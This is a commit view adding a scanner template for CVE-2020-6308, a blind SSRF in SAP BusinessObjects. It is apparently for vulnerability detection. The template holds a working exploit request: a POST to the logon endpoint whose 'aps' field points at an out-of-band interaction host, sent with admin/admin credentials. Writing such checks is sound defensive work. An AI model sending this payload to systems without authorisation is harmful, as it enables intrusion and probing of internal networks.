Merge pull request #1608 from Mad-robot/master

Create CVE-2020-6308.yaml
patch-1
Sandeep Singh 2021-06-05 00:04:56 +05:30 committed by GitHub
commit c0103e0b8a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
author: madrobot
severity: medium
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
tags: cve,cve2020,sap,ssrf,oob
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"